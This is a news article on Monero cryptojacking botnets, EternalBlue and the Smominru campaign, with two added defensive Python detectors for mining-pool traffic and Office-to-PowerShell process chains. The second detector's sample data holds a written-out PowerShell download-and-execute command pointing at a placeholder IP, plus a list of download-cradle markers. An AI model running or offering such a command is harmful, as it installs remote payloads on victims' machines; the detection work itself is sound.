Miners, Botnets, and Monero Create Perfect Storm for Cryptomining

Several things have come together in a perfect storm to create the most recent crypto-crime trend: the ability to surreptitiously install illicit Monero miners on unsuspecting computers around the world. Windows servers, laptops, Android devices, and IoT connected devices are all at risk.

The worst part? Targets often are unaware that they’ve been hacked — unless they notice an occasional performance slowdown or track their electricity use closely. No ransoms, no stolen passwords or personal information; victims may even find it difficult to convince anyone there’s a problem.

Perfect Storm

In 2017 a hacker group published EternalBlue, an exploit developed by the National Security Agency for a flaw in Microsoft's SMBv1 file-sharing protocol (patched by Microsoft as MS17-010) that lets an attacker take over an unpatched Windows machine over the network with no user interaction.
Cryptomining itself: proof-of-work blockchains pay miners a block reward in the coin being mined, so any CPU that can run a miner can be turned into a stream of cryptocurrency paid to whichever wallet the miner is configured with.
Cryptocurrency users looking for more anonymity than Bitcoin offers developed Monero, an altcoin whose transactions hide the sender, the recipient and the amount, making criminal proceeds far harder to trace.
Under the Radar

Cryptomining is both profitable and easy (enough) to mount. As a result, it is rapidly replacing ransomware as the crypto-related cybercrime of choice, especially as cybersecurity vendors are bringing ransomware protection to market. The combination of the above technologies has created what is essentially a perfect storm, threatening to wreak havoc on computer systems.

“What we’re looking at from a near and potentially long-term perspective is the value of a computer that has just a regular old CPU might be more just leaving it quietly running some cryptocurrency miner rather than infecting it with ransomware or some other software that might steal data,” explains Ryan Olson, Intelligence Director at Palo Alto Networks.

“In this new business model, attackers are no longer penalizing victims for opening an attachment or running a malicious script by taking systems hostage and demanding a ransom,” explains the Talos team. “Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining.”

A large number of compromised devices under one operator’s control is known as a botnet. Botnets are a staple of the attacker’s toolbox: they can mount distributed denial-of-service attacks and other operations that need large volumes of coordinated traffic or processing.

In illicit cryptomining, however, the bots do not need to coordinate with each other. Each infected machine runs its own miner, usually pointed at a public mining pool with the attacker’s wallet address, and the pool pays out in proportion to the work each bot submits. Because a single CPU earns very little, the operator’s profit comes from scale, which is why criminals install as many separate miners as they can.
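Because every bot has to reach a pool, the pool traffic is the one thing a mining botnet cannot hide from the network. The following detector is an added example, not code from the article or from any vendor quoted in it: it inspects the first JSON-RPC line of outbound connections (records assumed to be reconstructed from a proxy or network-sensor log) for the "stratum" methods Monero (XMRig-style) and Bitcoin-style miners use to log in to a pool, and checks whether the login field is a Monero wallet address (95 base58 characters starting with 4 or 8). The hostnames, port numbers and wallet string below are constructed for the example and are not real infrastructure.

```python
import json
import re
from typing import Optional

# Monero standard addresses (start with 4) and subaddresses (start with 8) are
# 95 base58 characters; base58 omits 0, O, I and l.
BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
XMR_ADDRESS_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")

# JSON-RPC methods used by XMRig-style (login/getjob/submit) and Bitcoin-style
# (mining.*) pool protocols.
STRATUM_METHODS = {"login", "getjob", "submit", "keepalived",
                   "mining.subscribe", "mining.authorize", "mining.submit"}


def classify_payload(payload: str) -> Optional[dict]:
    """Return a finding if a raw payload line looks like a miner talking to a pool."""
    try:
        msg = json.loads(payload)
    except ValueError:
        return None
    if not isinstance(msg, dict) or msg.get("method") not in STRATUM_METHODS:
        return None
    method = msg["method"]
    params = msg.get("params") or {}
    login, agent = "", ""
    if isinstance(params, list):
        # Bitcoin-style stratum: positional params. subscribe carries the user
        # agent, authorize carries the worker/wallet name.
        first = str(params[0]) if params else ""
        if method == "mining.subscribe":
            agent = first
        else:
            login = first
    elif isinstance(params, dict):
        login = str(params.get("login", ""))
        agent = str(params.get("agent", ""))
    return {"method": method, "login": login, "agent": agent,
            "monero_wallet": bool(XMR_ADDRESS_RE.match(login))}


def scan_connections(records):
    """records: iterable of (dst_host, dst_port, first_payload_line) tuples."""
    alerts = []
    for host, port, payload in records:
        finding = classify_payload(payload)
        if finding is not None:
            finding["dst"] = f"{host}:{port}"
            alerts.append(finding)
    return alerts


# Constructed sample records for this example; the wallet is a synthetic
# 95-character string that matches the Monero address format, not a real address.
FAKE_WALLET = "4" + (BASE58 * 2)[:94]
SAMPLE_RECORDS = [
    ("pool.example.invalid", 3333, json.dumps({
        "id": 1, "jsonrpc": "2.0", "method": "login",
        "params": {"login": FAKE_WALLET, "pass": "x", "agent": "XMRig/2.6.0"}})),
    ("api.example.invalid", 443, '{"method": "getUser", "params": {"id": 7}}'),
    ("btcpool.example.invalid", 3333,
     '{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.0"]}'),
    ("10.0.0.5", 80, "GET / HTTP/1.1"),
]

if __name__ == "__main__":
    for alert in scan_connections(SAMPLE_RECORDS):
        print(alert)
```

In practice the same check is worth running on the miner's configuration files and command lines on the host, since the wallet address and pool URL are the two values an operator cannot omit; a wallet that recurs across many machines ties them to one campaign.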

Case in point: Smominru. Smominru uses the NSA’s EternalBlue exploit to spread between Windows machines. The initial foothold is typically a phishing email with a Microsoft Word attachment: once the target opens the file, a Word macro runs a Visual Basic script, which in turn launches a PowerShell script that downloads and installs the miner executable.
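The chain described above (Word, then a script host, then PowerShell fetching a payload) leaves a distinctive process tree on the endpoint. As an added example that is not part of the article or of any vendor's tooling, the function below walks Sysmon-style process-creation events (the field names ProcessId, ParentProcessId, Image and CommandLine are assumed) and flags any powershell.exe whose ancestry passes through an Office application, noting whether a script host sat in between and which download-cradle markers appear on the command line. The events, paths and URL are constructed for the example.

```python
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Substrings that commonly indicate PowerShell being used to fetch and run code.
CRADLE_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "invoke-expression", "iex", "-encodedcommand", "-enc",
                  "bitsadmin", "net.webclient")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_office_to_powershell(events: List[Dict]) -> List[Dict]:
    """Return a finding for each powershell.exe descended from an Office app."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["Image"]) != "powershell.exe":
            continue
        chain = [basename(e["Image"])]
        via_script_host = False
        office_app = None
        parent = by_pid.get(e["ParentProcessId"])
        depth = 0
        # Walk up the tree; the depth cap guards against malformed/cyclic data.
        while parent is not None and depth < 16:
            name = basename(parent["Image"])
            chain.append(name)
            if name in SCRIPT_HOSTS:
                via_script_host = True
            if name in OFFICE_APPS:
                office_app = name
                break
            parent = by_pid.get(parent["ParentProcessId"])
            depth += 1
        if office_app is None:
            continue
        cmd = e["CommandLine"].lower()
        findings.append({
            "pid": e["ProcessId"],
            "office_app": office_app,
            "via_script_host": via_script_host,
            "chain": " <- ".join(chain),
            "cradle_markers": [m for m in CRADLE_MARKERS if m in cmd],
        })
    return findings


# Constructed sample events (Sysmon Event ID 1 style). PID 400 is the macro chain;
# PID 500 is an administrator running PowerShell from Explorer and must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": 'WINWORD.EXE /n "C:\\Users\\alice\\Downloads\\Invoice.doc"'},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\alice\AppData\Local\Temp\inv.vbs"},
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX ((New-Object "
                    "Net.WebClient).DownloadString('http://198.51.100.7/m.ps1'))"},
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for f in find_office_to_powershell(SAMPLE_EVENTS):
        print(f)
```

The parent-child walk matters more than the command-line markers: obfuscated cradles change constantly, but a word processor that ends up launching PowerShell is rarely legitimate, so the tree alone is worth an alert and the markers just raise its priority.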

One of the main cryptocurrencies that makes this whole process work is Monero, a privacy-focused cryptocurrency. “Bitcoin alternatives like Monero and Ethereum continue their overall upward trend in value,” explains Sandiford Oliver, Cybersecurity Researcher for Proofpoint, “putting them squarely in the crosshairs of threat actors looking for quick profits and anonymous transactions.”

While other cryptocurrencies do have their own roles, Monero is shaping up to be the favorite. “This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe,” says Kevin Epstein, Vice President of Proofpoint’s Threat Operations Center.

05.03.2018 / 20:10